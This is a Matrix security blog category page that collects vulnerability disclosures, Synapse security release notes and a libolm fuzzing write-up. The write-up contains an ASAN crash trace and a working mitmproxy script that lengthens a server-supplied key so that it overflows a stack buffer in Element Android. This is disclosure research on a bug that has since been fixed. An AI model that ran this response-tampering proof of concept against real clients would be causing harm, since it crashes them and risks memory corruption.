Category – Security
22 posts tagged with "Security"

Disclosing CVE-2021-40823 and CVE-2021-40824: E2EE vulnerability in multiple Matrix clients

2021-09-13 — Security — Denis Kasak, Dan Callahan, and Matthew Hodgson

Today we are disclosing a critical security issue affecting multiple Matrix clients and libraries including Element (Web/Desktop/Android), FluffyChat, Nheko, Cinny, and SchildiChat. Element on iOS is not affected.

Specifically, in certain circumstances it may be possible to trick vulnerable clients into disclosing encryption keys for messages previously sent by that client to user accounts later compromised by an attacker.

Exploiting this vulnerability to read encrypted messages requires gaining control over the recipient’s account. This requires either compromising their credentials directly or compromising their homeserver.

Thus, the greatest risk is to users who are in encrypted rooms containing malicious servers. Admins of malicious servers could attempt to impersonate their users' devices in order to spy on messages sent by vulnerable clients in that room.

This is not a vulnerability in the Matrix or Olm/Megolm protocols, nor the libolm implementation. It is an implementation bug in certain Matrix clients and SDKs which support end-to-end encryption (“E2EE”).

We have no evidence of the vulnerability being exploited in the wild.

This issue was discovered during an internal audit by Denis Kasak, a security researcher at Element.

Remediation and Detection

Patched versions of affected clients are available now; please upgrade as soon as possible — we apologise sincerely for the inconvenience. If you are unable to upgrade, consider keeping vulnerable clients offline until you can. If vulnerable clients are offline, they cannot be tricked into disclosing keys. They may safely return online once updated.

Unfortunately, it is difficult or impossible to retroactively identify instances of this attack with standard logging levels present on both clients and servers. However, as the attack requires account compromise, homeserver administrators may wish to review their authentication logs for any indications of inappropriate access.

Similarly, users should review the list of devices connected to their account with an eye toward missing, untrusted, or non-functioning devices. Because an attacker must impersonate an existing or historical device, exploiting this vulnerability would either break an existing login on the user’s account, or a historical device would be re-added and flagged as untrusted.

Lastly, if you have previously verified the users / devices in a room, you would witness the safety shield on the room turn red during the attack, indicating the presence of an untrusted and potentially malicious device.

Affected Software

Given the severity of this issue, Element attempted to review all known encryption-capable Matrix clients and libraries so that patches could be prepared prior to public disclosure.

Known vulnerable software:

We believe the following software is not vulnerable:

We believe the following are not vulnerable due to not implementing key sharing:

Background

Matrix supports the concept of “key sharing”, letting a Matrix client which lacks the keys to decrypt a message request those keys from that user's other devices or the original sender's device.

This was a feature added in 2016 in order to address edge cases where a newly logged-in device might not have the necessary keys to decrypt historical messages. Specifically, if other devices in the room are unaware of the new device due to a network partition, they have no way to encrypt for it—meaning that the only way the new device will be able to decrypt history is if the recipient's other devices share the necessary keys with it.

Other situations where key sharing is desirable include when the recipient hasn't backed up their keys (either online or offline) and needs them to decrypt history on a new login, or when facing implementation bugs which prevent clients from sending keys correctly. Requesting keys from a user's other devices sidesteps these issues.

Key sharing is described in the Matrix E2EE Implementation Guide, which contains the following paragraph:

In order to securely implement key sharing, clients must not reply to every key request they receive. The recommended strategy is to share the keys automatically only to verified devices of the same user.

This is the approach taken in the original implementation in matrix-js-sdk, as used in Element Web and others, with the extension of also letting the sending device service keyshare requests from recipient devices. Unfortunately, the implementation did not sufficiently verify the identity of the device requesting the keyshare, meaning that a compromised account can impersonate the device requesting the keys, creating this vulnerability.

This is not a protocol or specification bug, but an implementation bug which was then unfortunately replicated in other independent implementations.

While we believe we have identified and contacted all affected E2EE client implementations: if your client implements key sharing requests, we strongly recommend you check that you cryptographically verify the identity of the device which originated the key sharing request.
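A minimal sketch of the guide's recommended strategy might look like the following. It is an illustration only: `Device`, `KeyRequest`, and `should_share_key` are hypothetical names rather than any SDK's API, and the sketch assumes the transport layer has already established which identity key the request is cryptographically bound to (`authenticated_identity_key`). It covers only the same-user case from the guide, not the extension where the sending device serves requests from recipient devices.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass(frozen=True)
class Device:
    """Locally stored record of a device (hypothetical structure)."""
    user_id: str
    device_id: str
    identity_key: str  # the device's long-term public identity key
    verified: bool     # True if we have verified this device


@dataclass(frozen=True)
class KeyRequest:
    """An incoming key request (hypothetical structure)."""
    requesting_user_id: str
    requesting_device_id: str
    # Identity key the request is cryptographically bound to, or None if the
    # request could not be authenticated. Assumed to come from the transport.
    authenticated_identity_key: Optional[str]


def should_share_key(
    own_user_id: str,
    request: KeyRequest,
    known_devices: Dict[Tuple[str, str], Device],
) -> bool:
    """Return True only for verified devices of the same user whose
    authenticated identity key matches the one we have on record."""
    if request.requesting_user_id != own_user_id:
        return False
    device = known_devices.get(
        (request.requesting_user_id, request.requesting_device_id)
    )
    if device is None or not device.verified:
        return False
    if request.authenticated_identity_key is None:
        return False
    # A claimed device ID is not enough: compare against the verified key.
    return request.authenticated_identity_key == device.identity_key
```

The point of the sketch is that the decision hinges on the verified device's identity key rather than on the device ID claimed in the request, which a compromised account could spoof.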

Next Steps

The fact that this vulnerability was independently introduced so many times is a clear signal that the current wording in the Matrix Spec and the E2EE Implementation Guide is insufficient. We will thoroughly review the related documentation and revise it with clear guidelines on safely implementing key sharing.

Going further, we will also consider whether key sharing is still a necessary part of the Matrix protocol. If it is not, we will remove it. As discussed above, key sharing was originally introduced to make E2EE more reliable while we were ironing out its many edge cases and failure modes. Meanwhile, implementations have become much more robust, to the point that we may be able to go without key sharing completely. We will also consider changing how we present situations in which you cannot decrypt messages because the original sender was not aware of your presence. For example, undecryptable messages could be filed in a separate conversation thread, or those messages could require that keys are shared manually, effectively turning a bug into a feature.

We will also accelerate our work on matrix-rust-sdk as a portable reference implementation of the Matrix protocol, avoiding the implicit requirement that each independent library must necessarily reimplement this logic on its own. This will have the effect of reducing attack surface and simplifying audits for software which chooses to use matrix-rust-sdk.

Finally, we apologise to the wider Matrix community for the inconvenience and disruption of this issue. While Element discovered this vulnerability during an internal audit of E2EE implementations, we will be funding an independent end-to-end audit of the reference Matrix E2EE implementations (not just Olm + libolm) in the near future to help mitigate the risk from any future vulnerabilities. The results of this audit will be made publicly available.

Timeline

Ultimately, Element took two weeks from initial discovery to completing an audit of all known, public E2EE implementations. It took a further week to coordinate disclosure, culminating in today's announcement.

  • Monday, 23rd August — Discovery that Element Web is exploitable.
  • Thursday, 26th August — Determination that Element Android is exploitable with a modified attack.
  • Wednesday, 1st September — Determination that Element iOS fails safe in the presence of device changes.
  • Friday, 3rd September — Determination that FluffyChat and Nheko are exploitable.
  • Tuesday, 7th September — Audit of Matrix clients and libraries complete.
  • Wednesday, 8th September — Affected software authors contacted, disclosure timelines agreed.
  • Friday, 10th September — Public pre-disclosure notification. Downstream packagers (e.g., Linux distributions) notified via Matrix and e-mail.
  • Monday, 13th September — Coordinated releases of all affected software, public disclosure.

Pre-disclosure: upcoming critical fix for several popular Matrix clients

2021-09-10 — Security — Matrix Security

Hi all,

A critical security vulnerability impacting several popular Matrix clients and libraries was recently discovered. A coordinated security release of the affected components will be happening in the afternoon (from a UTC perspective) of Monday, Sept 13th.

We will be reaching out to downstream packagers to ensure they can prepare patched versions of affected packages at the time of the release. The details of the vulnerability will be disclosed in a blog post on the day of the release. There is so far no evidence of the vulnerability being exploited in the wild.

Please be prepared to upgrade as soon as the patched versions are released.

Thank you for your patience while we work to resolve this issue.

Synapse 1.41.1 released

2021-08-31 — Releases, Security — Dan Callahan

Today we are releasing Synapse 1.41.1, a security update based on last week's release of Synapse 1.41.0. This release patches two moderate severity issues which could reveal metadata about private rooms:

  • GHSA-3x4c-pq33-4w3q / CVE-2021-39164: Enumerating a private room's list of members and their display names.

    If an unauthorized user both knows the Room ID of a private room and that room's history visibility is set to shared, then they may be able to enumerate the room's members, including their display names.

    The unauthorized user must be on the same homeserver as a user who is a member of the target room.

  • GHSA-jj53-8fmw-f2w2 / CVE-2021-39163: Disclosing a private room's name, avatar, topic, and number of members.

    If an unauthorized user knows the Room ID of a private room, then its name, avatar, topic, and number of members may be disclosed through Group / Community features.

    The unauthorized user must be on the same homeserver as a user who is a member of the target room, and their homeserver must allow non-administrators to create groups (enable_group_creation in the Synapse configuration; off by default).

Note that in both cases:

  • The private room's Room ID must be known to the attacker.
  • Another user on the attacker's homeserver must be a legitimate member of the target room.
  • The information disclosed is already present in the database and thus legitimately known to the administrators of homeservers participating in the target room.

We'd like to credit 0xkasper for discovering and responsibly disclosing these issues.

This release also fixes a small regression in 1.41.0 (#10709) which broke compatibility with older Twisted versions when Synapse was configured to send email.

Please update at your earliest convenience.

Security update: Synapse 1.37.1 released

2021-06-30 — Releases, Security — Matthew Hodgson

Hi all,

Over the last few days we've seen a distributed spam attack across the public Matrix network, where large numbers of spambots have been registered across servers with open registration and then used to flood abusive traffic into rooms such as Matrix HQ.

The spam itself has been handled by temporarily banning the abused servers. However, on Monday and Tuesday the volume of traffic triggered performance problems for the homeservers participating in targeted rooms (e.g. memory explosions, or very delayed federation). This was due to a combination of factors, but one of the most important ones was Synapse issue #9490: that one busy room could cause head-of-line blocking, starving your server from processing events in other rooms, causing all traffic to fall behind.

We're happy to say that Synapse 1.37.1 fixes this and we now process inbound federation traffic asynchronously, ensuring that one busy room won't impact others. First impressions are that this has significantly improved federation performance and end-to-end encryption stability — for instance, new E2EE keys from remote users for a given conversation should arrive immediately rather than being blocked behind other traffic.
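To illustrate why per-room processing avoids head-of-line blocking, here is a minimal asyncio sketch. It is not Synapse's implementation: `RoomDispatcher`, `demo`, and the room IDs are hypothetical, and the "slow" room is simulated with a short sleep. Each room gets its own FIFO queue and worker, so ordering is preserved within a room while a busy room cannot delay the others.

```python
import asyncio
from typing import Awaitable, Callable, Dict, List, Tuple

Handler = Callable[[str, str], Awaitable[None]]


class RoomDispatcher:
    """One FIFO queue and one worker task per room (hypothetical design)."""

    def __init__(self, handler: Handler) -> None:
        self._handler = handler
        self._queues: Dict[str, asyncio.Queue] = {}
        self._workers: Dict[str, asyncio.Task] = {}

    def submit(self, room_id: str, event: str) -> None:
        """Queue an event; must be called from inside a running event loop."""
        if room_id not in self._queues:
            self._queues[room_id] = asyncio.Queue()
            self._workers[room_id] = asyncio.create_task(self._drain(room_id))
        self._queues[room_id].put_nowait(event)

    async def _drain(self, room_id: str) -> None:
        """Process this room's events strictly in arrival order."""
        queue = self._queues[room_id]
        while True:
            event = await queue.get()
            try:
                await self._handler(room_id, event)
            finally:
                queue.task_done()

    async def join(self) -> None:
        """Wait until every queue is empty, then stop the workers."""
        await asyncio.gather(*(q.join() for q in self._queues.values()))
        for task in self._workers.values():
            task.cancel()
        await asyncio.gather(*self._workers.values(), return_exceptions=True)


async def demo() -> List[Tuple[str, str]]:
    """Return the order in which events finished processing."""
    finished: List[Tuple[str, str]] = []

    async def handler(room_id: str, event: str) -> None:
        # Simulate a busy room whose events are expensive to process.
        await asyncio.sleep(0.05 if room_id == "!busy" else 0)
        finished.append((room_id, event))

    dispatcher = RoomDispatcher(handler)
    for i in range(3):
        dispatcher.submit("!busy", f"b{i}")
    dispatcher.submit("!quiet", "q0")  # arrives after the busy room's backlog
    await dispatcher.join()
    return finished
```

Running `asyncio.run(demo())` shows the quiet room's event completing before the busy room's backlog, even though it was submitted last.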

Please upgrade to Synapse 1.37.1 as soon as possible, in order to increase resilience to any other traffic spikes.

Also, we highly recommend that you disable open registration or, if you keep it enabled, use SSO or require email validation to avoid abusive signups. Empirically, adding a CAPTCHA is not enough. Otherwise you may find your server blocked all over the place if it is hosting spambots.

Finally, if your server has open registration, PLEASE check whether spambots have been registered on your server, and deactivate them. Once deactivated, you will need to contact [email protected] to request that blocks on your server are removed.

Your best bet for spotting and neutralising dormant spambots is to review signups on your homeserver over the past 3-5 days and deactivate suspicious users. We do not recommend relying solely on lists of suspicious IP addresses for this task, as the distributed nature of the attack means any such list is likely to be incomplete or include shared proxies which may also catch legitimate users.

To ease review, we're working on an auditing script in #10290; feedback on whether this is useful would be appreciated. Problematic accounts can then be dealt with using the Deactivate Account Admin API.
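Until such a script is available, the review step can be sketched as a simple filter over exported user records. This is only an illustration and not the auditing script mentioned above: `recent_signups` is a hypothetical helper, and it assumes each record is a dict with a `name`, a `creation_ts` in milliseconds since the epoch, and an optional `deactivated` flag. Adapt the field names to whatever your data source actually provides.

```python
from typing import Any, Dict, Iterable, List

MS_PER_DAY = 24 * 60 * 60 * 1000


def recent_signups(
    users: Iterable[Dict[str, Any]],
    now_ms: int,
    days: int = 5,
) -> List[Dict[str, Any]]:
    """Return still-active accounts created within the last `days` days,
    newest first, so that they can be reviewed by hand."""
    cutoff = now_ms - days * MS_PER_DAY
    candidates = [
        user for user in users
        # Field names are assumptions; see the lead-in above.
        if user["creation_ts"] >= cutoff and not user.get("deactivated", False)
    ]
    return sorted(candidates, key=lambda user: user["creation_ts"], reverse=True)
```

The output is a review list, not a verdict: deciding which accounts are actually spambots still needs human judgement.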

Meanwhile, over to Dan for the Synapse 1.37 release notes.

Synapse 1.37 Release Announcement

Synapse 1.37 is now available!

Note: The legacy APIs for Spam Checker extension modules are now considered deprecated and targeted for removal in August. Please see the module docs for information on updating.

This release also removes Synapse's built-in support for the obsolete ACMEv1 protocol for automatically obtaining TLS certificates. Server administrators should place Synapse behind a reverse proxy for TLS termination, or switch to a standalone ACMEv2 client like certbot.

Knock, knock?

After nearly 18 months and 129 commits, Synapse now includes support for MSC2403: Add "knock" feature and Room Version 7! This feature allows users to directly request admittance to private rooms, without having to track down an invitation out-of-band. One caveat: Though the server-side foundation is there, knocking is not yet implemented in clients.

A Unified Interface for Extension Modules

Third party modules can customize Synapse's behavior, implementing things like bespoke media storage providers or user event filters. However, Synapse previously lacked a unified means of enumerating and configuring third-party modules. That changes with Synapse 1.37, which introduces a new, generic interface for extensions.

This new interface consolidates configuration into one place, allowing for more flexibility and granularity by explicitly registering callbacks with specific hooks. You can learn more about the new module API in the docs linked above, or in Matrix Live S6E29, due out this Friday, July 2nd.

Safer Reauthentication

User-interactive authentication ("UIA") is required for potentially dangerous actions like removing devices or uploading cross-signing keys. However, Synapse can optionally be configured to provide a brief grace period such that users are not prompted to re-authenticate on actions taken shortly after logging in or otherwise authenticating.

This improves user experience, but also creates risks for clients which rely on UIA as a guard against actions like account deactivation. Synapse 1.37 protects users by exempting especially risky actions from the grace period. See #10184 for details.
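The idea can be sketched as follows. This is an assumption-laden illustration rather than Synapse's code: `requires_reauth` and the action names are hypothetical, and the exempt set contains only account deactivation because that is the one example named above.

```python
# Actions that always require fresh authentication, regardless of any grace
# period. Illustrative only: the real list is described in #10184.
ALWAYS_REAUTH = frozenset({"deactivate_account"})


def requires_reauth(
    action: str,
    seconds_since_last_auth: float,
    grace_period_seconds: float,
) -> bool:
    """Decide whether the user must re-authenticate before `action`."""
    if action in ALWAYS_REAUTH:
        # Especially risky actions are exempt from the grace period.
        return True
    # Otherwise, skip the prompt only while the grace period is still running.
    return seconds_since_last_auth > grace_period_seconds
```

With a 60 second grace period, removing a device 10 seconds after logging in would not prompt again, while deactivating the account always would.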

Smaller Improvements

We've landed a number of smaller improvements which, together, make Synapse more responsive and reliable. We now:

  • More efficiently respond to key requests, preventing excessive load (#10221, #10144)
  • Render docs for each vX.Y Synapse release, starting with v1.37 (#10198)
  • Ensure that log entries from failures during early startup are not lost (#10191)
  • Have a notion of database schema "compatibility versions", allowing for more graceful upgrades and downgrades of Synapse (docs)

We've also resolved two bugs which could cause sync requests to immediately return with empty payloads (#8518), producing a tight loop of repeated network requests.

Everything Else

Lastly, we've merged an experimental implementation of MSC2716: Incrementally importing history into existing rooms (#9247) as part of Element's work to fully integrate Gitter into Matrix.

These are just the highlights; please see the Upgrade Information and Release Notes for a complete list of changes in this release.

Synapse is a Free and Open Source Software project, and we'd like to extend our thanks to everyone who contributed to this release, including aaronraimist, Bubu, dklimpel, jkanefendt, lukaslihotzki, mikure, and Sorunome.

Adventures in fuzzing libolm

2021-06-14 — Security, Research — Denis Kasak

Introduction

Hi all! My name is Denis and I'm a security researcher. Six months ago, I started working for Element on doing dedicated security research on important Matrix projects. After some initial focus on Synapse, I decided to take a closer look at libolm. In this entry, I'd like to present an overview of that work, along with some early fruits that came out of it.

TL;DR: we found some bugs which had crept in since libolm's original audit in 2016, thanks to properly overhauling our fuzzing capability, and we'd like to tell you all about it! The bugs were not easily exploitable (if at all), and have already been fixed.

Update: CVE-2021-34813 has now been assigned to this.

To give a bit of background, libolm is a cryptographic library implementing the Double Ratchet Algorithm pioneered by Signal and it is the cryptographic workhorse behind Matrix. The classic algorithm is called Olm in Matrix land, but libolm also implements Megolm, which is a variant for efficient encrypted group chats between many participants.

Since libolm is currently used in all Matrix clients supporting end-to-end encryption, it makes for a particularly juicy target. The present state of libolm's monopoly on Matrix encryption is somewhat unfortunate -- luckily there are some exciting new developments on the horizon, such as the vodozemac implementation in Rust. But for now, we're stuck with libolm.

To start, I decided to do a bit of fuzzing. libolm already had a fuzzing setup using AFL, but it was written a while ago. The state of the art in fuzzing had advanced quite rapidly in the last few years, so the setup was missing many modern features and techniques. As an example, the fuzzing setup was configured to use the now ancient afl-gcc coverage mode, which can be slower than the more modern LLVM-based coverage by a factor of 2.

I also noticed that the fuzzing was done with non-hardened binaries (instead of using something like ASAN), so many memory errors could've gone unnoticed. There were also no corpora available from previous fuzzing runs and some of the newer code was not covered by the harnesses.

Preparation

I decided to tackle these one by one, adding ASAN and MSAN builds as a first step. I took the opportunity to switch to AFL++ since it is a drop-in replacement and contains numerous improvements, notably improved coverage modes which are either much faster (e.g. LLVM-PCGUARD) or guaranteed to have no collisions (LTO)[1]. AFL++ also optimizes mutation scheduling (by using scheduling algorithms from AFLFast) and mutation operator selection (through MOpt). All of this makes it much more efficient at discovering bugs.

After this, I changed the existing harnesses to use AFL's persistent mode (which lowers process creation overhead and thus increases fuzzing performance). This change, combined with the switch to a newer coverage mode, increased the fuzzing exec/s from ~2.5k to ~5.5k on my machine, so this is not an insignificant gain!

After this preparatory work, I generated a small initial corpus and ran a small fleet of fuzzers with varying parameters. Almost immediately, I started getting heaps of crashes. Luckily, after some investigation, these turned out not to be serious bugs in the library but a double-free in the fuzzing harness! The double-free only got triggered when the input was of size 0. It also only happened with AFL++ and not vanilla AFL, presumably due to differences in input trimming logic, which must be the reason no one noticed this earlier. I quickly came up with a patch and resumed.

The plot thickens

I let the fuzzers run for a while. Since ASAN introduces a bit of a performance overhead, I only ran a single AFL instance with the ASAN variant of the binary. This is okay because all fuzzer instances actually synchronize their findings, which means every instance gets to see every input, which increases coverage. When I came back to check, there was another crash waiting. This time the crashing input wasn't being generated continually so it looked much more promising -- and only the ASAN instance was crashing. A-ha!

Running the offending input on the ASAN variant of the harness revealed it was an invalid read one byte past the end of a heap buffer. The read was happening in the base64 decoder:

❮ ./build/fuzzers/fuzz_group_decrypt_asan "" pickled-inbound-group-session.txt <input
=================================================================
==1838065==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf4a00795 at pc 0x56560660 bp 0xffff9df8 sp 0xffff9de8
READ of size 1 at 0xf4a00795 thread T0
    #0 0x5656065f in olm::decode_base64(unsigned char const*, unsigned int, unsigned char*) src/base64.cpp:124
    #1 0x565607b5 in _olm_decode_base64 src/base64.cpp:165
    #2 0x565d5a9e in olm_group_decrypt_max_plaintext_length src/inbound_group_session.c:304
    #3 0x56558e75 in main fuzzers/fuzz_group_decrypt.cpp:46
    #4 0xf7509a0c in __libc_start_main (/usr/lib32/libc.so.6+0x1ea0c)
    #5 0x5655a0f4 in _start (/home/dkasak/code/olm/build/fuzzers/fuzz_group_decrypt_asan+0x50f4)

0xf4a00795 is located 0 bytes to the right of 5-byte region [0xf4a00790,0xf4a00795)
allocated by thread T0 here:
    #0 0xf7a985c5 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x56558ce3 in main fuzzers/fuzz_group_decrypt.cpp:32
    #2 0xf7509a0c in __libc_start_main (/usr/lib32/libc.so.6+0x1ea0c)

SUMMARY: AddressSanitizer: heap-buffer-overflow src/base64.cpp:124 in olm::decode_base64(unsigned char const*, unsigned int, unsigned char*)
Shadow bytes around the buggy address:
  0x3e9400a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3e9400f0: fa fa[05]fa fa fa 05 fa fa fa fa fa fa fa fa fa
  0x3e940100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1838065==ABORTING

Following the stack trace, I quickly pinpointed the root of the bug: the logic of the decoder was subtly flawed, unconditionally accessing a remainder byte[2] in the base64 input which might not actually be there. This occurs when the input is 1 (mod 4) in length, which can never happen in a valid base64 payload, but of course we cannot assume all inputs are necessarily valid payloads. Specifically, if the payload was not 0 (mod 4) in length, the code was assuming it was at least 2 (mod 4) or more in length and immediately read the second byte. This spurious byte was then incorporated into the output value.

I examined the code in an attempt to find a way to have it leak more than a single byte, but it was impossible. As it turned out, not even the full byte of useful information was encoded into the output -- due to the way the byte is encoded, only about 6 bits of useful information ended up in the output value.

Still, even a single leaked bit is too much in a cryptographic context. Could we do some heap hacking so that something of interest is placed there and then have it be leaked to us?

I next tracked down all call sites of the vulnerable function olm::decode_base64. Most of them were immune to the problem since they were preceded with calls to another function, olm::decode_base64_length, which checks that the base64 payload is of legal length. This left me with only a few potentially vulnerable call sites, so I examined where their base64 inputs come from. Promisingly, two of them received input from other conversation participants, but they either had no way of leaking the information back to the attacker or they hardcoded the number of bytes to be processed, after ensuring the input was of some minimum length. The output of the remaining function olm_pk_decrypt is never sent anywhere externally, so there was again no way of leaking the data to the attacker.
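The length rule behind that check can be modelled in a few lines of Python. This is a sketch of the arithmetic only, not libolm's code: `decoded_length` and `decode_unpadded_base64` are hypothetical helpers, and the sketch assumes unpadded base64 input. Python cannot read past the end of a buffer, so the model can only show the validation, not the invalid read itself.

```python
import base64
from typing import Optional


def decoded_length(encoded_length: int) -> Optional[int]:
    """Number of bytes that `encoded_length` unpadded base64 characters
    decode to, or None if no valid payload can have that length."""
    if encoded_length % 4 == 1:
        # A lone trailing character carries only 6 bits: less than one byte.
        return None
    return encoded_length * 3 // 4


def decode_unpadded_base64(data: str) -> bytes:
    """Decode unpadded base64, rejecting illegal lengths up front."""
    if decoded_length(len(data)) is None:
        raise ValueError("invalid base64 length: 1 (mod 4)")
    padding = "=" * (-len(data) % 4)  # restore padding for the stdlib decoder
    return base64.b64decode(data + padding, validate=True)
```

For example, `decode_unpadded_base64("QUJD")` returns `b"ABC"`, while a five-character input such as `"QUJDR"` is rejected before any decoding happens.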

In conclusion, even though this invalid read is a valid bug, I was not able to find a working exploit for it.

But wait a second! Something was still bothering me about olm_pk_decrypt. It's a fairly complex function, receives several string inputs from the homeserver and it itself isn't tested by any of the harnesses. Furthermore, the reason I started looking at it in the first place is that it was missing the olm::decode_base64_length check. Perhaps it warrants a closer look?

It does

And sure enough, there was something amiss. olm_pk_decrypt receives three base64 inputs from the homeserver: the ciphertext to decrypt, an ephemeral public key and a MAC. All three are eventually passed to olm::decode_base64 to be decoded. Yet there was only a single length check there, to ensure the decrypted ciphertext would fit its output buffer. What would happen if the server returned a public key that was longer than expected?

struct _olm_curve25519_public_key ephemeral;
olm::decode_base64(
    (const uint8_t*)ephemeral_key, ephemeral_key_length,
    (uint8_t *)ephemeral.public_key
);

As can be seen from the snippet, the decoded version of the public key gets written to ephemeral.public_key, which is an array allocated on the stack. If the input is longer than expected, this will become a stack buffer overflow.
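One plausible shape for the missing check, modelled in Python, is to reject any input whose length does not correspond to exactly one key before decoding it. This is a sketch and not the actual patch: `decode_public_key` is a hypothetical helper, and the only hard facts it relies on are that a Curve25519 public key is 32 bytes long and that 32 bytes encode to 43 unpadded base64 characters.

```python
import base64

CURVE25519_KEY_LENGTH = 32  # bytes in a Curve25519 public key

# Unpadded base64 needs ceil(4 * n / 3) characters for n bytes: 43 for 32.
ENCODED_KEY_LENGTH = (CURVE25519_KEY_LENGTH * 4 + 2) // 3


def decode_public_key(encoded: str) -> bytes:
    """Decode an unpadded base64 public key, refusing any input that would
    not fit a fixed 32-byte destination exactly."""
    if len(encoded) != ENCODED_KEY_LENGTH:
        raise ValueError(
            f"expected {ENCODED_KEY_LENGTH} base64 characters, "
            f"got {len(encoded)}"
        )
    padding = "=" * (-len(encoded) % 4)  # restore padding for the stdlib
    raw = base64.b64decode(encoded + padding, validate=True)
    if len(raw) != CURVE25519_KEY_LENGTH:
        raise ValueError("decoded key has the wrong length")
    return raw
```

In C or C++ the same comparison would have to happen before the decoder is allowed to write into the fixed-size destination array.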

The purpose of olm_pk_decrypt is to decrypt secrets previously stored by a Matrix device on the homeserver. The point of encryption is to prevent the server from learning these secrets since they're supposed to be known only by your own devices. One use case for this mechanism is to allow one of your devices to store encrypted end-to-end encryption keys on the homeserver. Your other devices can then retrieve those keys from the homeserver, making it possible to view all of your private conversations on each of your devices.

I decided to go for an end-to-end test to confirm the bug is triggerable by connecting with the latest Element Android from my test phone to my homeserver, with mitmproxy sitting in between. This allowed me to write a small mitmproxy script which intercepts HTTP calls fetching the E2E encryption keys from the homeserver and modifies the response so that the key is longer than expected.

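"""mitmproxy addon: lengthen the ephemeral key in key backup responses."""
import json

from mitmproxy import ctx, http


def response(flow: http.HTTPFlow) -> None:
    # Only tamper with responses to requests that fetch backed-up room keys.
    if ("/_matrix/client/unstable/room_keys/keys" in flow.request.pretty_url
            and flow.request.method == "GET"):

        response_body = flow.response.content.decode("utf-8")
        response_json = json.loads(response_body)

        # Pick the first room and the first backed-up session in that room.
        rooms = response_json["rooms"]
        room_id = list(rooms.keys())[0]

        sessions = rooms[room_id]["sessions"]
        session = list(sessions.keys())[0]
        session_data = sessions[session]["session_data"]

        # Repeat the base64 ephemeral key ten times so that it is much
        # longer than the client expects.
        ephemeral = session_data["ephemeral"]
        ctx.log.info(f"Replacing ephemeral key '{ephemeral}' with '{ephemeral * 10}'")
        session_data["ephemeral"] = ephemeral * 10

        # Re-serialise the modified JSON and pass it on to the client.
        modified_body = json.dumps(response_json).encode("utf-8")
        flow.response.content = modified_body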

This longer value is then eventually passed by Element Android to libolm's olm_pk_decrypt, which triggers the buffer overflow. With all of that in place, I deleted the local encryption key backup on my device and asked for it to be restored from the server:

F libc    : stack corruption detected (-fstack-protector)
F libc    : Fatal signal 6 (SIGABRT), code -6 (SI_TKILL) in tid 24517 (DefaultDispatch), pid 24459 (im.vector.app)
F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
F DEBUG   : Build fingerprint: 'xiaomi/tissot/tissot_sprout:9/PKQ1.180917.001/V10.0.24.0.PDHMIXM:user/release-keys'
F DEBUG   : Revision: '0'
F DEBUG   : ABI: 'arm64'
F DEBUG   : pid: 24459, tid: 24517, name: DefaultDispatch  >>> im.vector.app <<<
F DEBUG   : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
F DEBUG   : Abort message: 'stack corruption detected (-fstack-protector)'
F DEBUG   :     x0  0000000000000000  x1  0000000000005fc5  x2  0000000000000006  x3  0000000000000008
F DEBUG   :     x4  0000000000000000  x5  0000000000000000  x6  0000000000000000  x7  0000000000000030
F DEBUG   :     x8  0000000000000083  x9  7d545b4513138652  x10 0000000000000000  x11 fffffffc7ffffbdf
F DEBUG   :     x12 0000000000000001  x13 0000000060b0f2a9  x14 0022ed916fede200  x15 0000d925cd93f18f
F DEBUG   :     x16 00000079e741b2b0  x17 00000079e733c9d8  x18 0000000000000000  x19 0000000000005f8b
F DEBUG   :     x20 0000000000005fc5  x21 0000007940e3c400  x22 000000000000026b  x23 00000000000001d0
F DEBUG   :     x24 000000000000002f  x25 000000793d9653f0  x26 0000007948303368  x27 0000007945dd5588
F DEBUG   :     x28 00000000000001d0  x29 0000007945dd37d0
F DEBUG   :     sp  0000007945dd3790  lr  00000079e732e00c  pc  00000079e732e034

Impact

This vulnerability is a server-controlled stack buffer overflow in Matrix clients supporting room key backup.

Of course, the largest fear stemming from any remotely controlled stack buffer overflow is code execution. This is perhaps even doubly so in a cryptographic library, where we have the additional worry of an attacker being able to leak our dearly protected conversations.

The federated architecture of Matrix may be somewhat of a mitigating circumstance in this case, since users are much more likely to know and trust the homeserver owner, but we don't want to have to rely on this trust.

Native binaries

Luckily, on its own, this bug is not enough to successfully execute code on native binaries. By default, libolm is compiled for all supported targets with stack canaries (also called stack protectors or stack cookies), which are magic values unknown to the attacker, placed just before the current function's frame on the stack. This value is checked upon returning from the function -- if its value is changed, the process aborts itself to prevent further damage. This is evident from the Abort message: 'stack corruption detected (-fstack-protector)' message above. Besides canaries, other system-level protections exist to make exploiting bugs such as this harder, such as ASLR.

Therefore, to achieve remote code execution, an attacker would need to find additional vulnerabilities which would allow them to exfiltrate the stack canary and addresses of key memory locations from the system.

WASM

With WASM, the analysis is much more complicated due to its very different memory and execution model. In WASM, the unmanaged stack is generally much more vulnerable because it lacks support for stack canaries. This means a stack buffer overflow can overwrite not only the frame of the function in which the overflow occurred but also all parent frames.

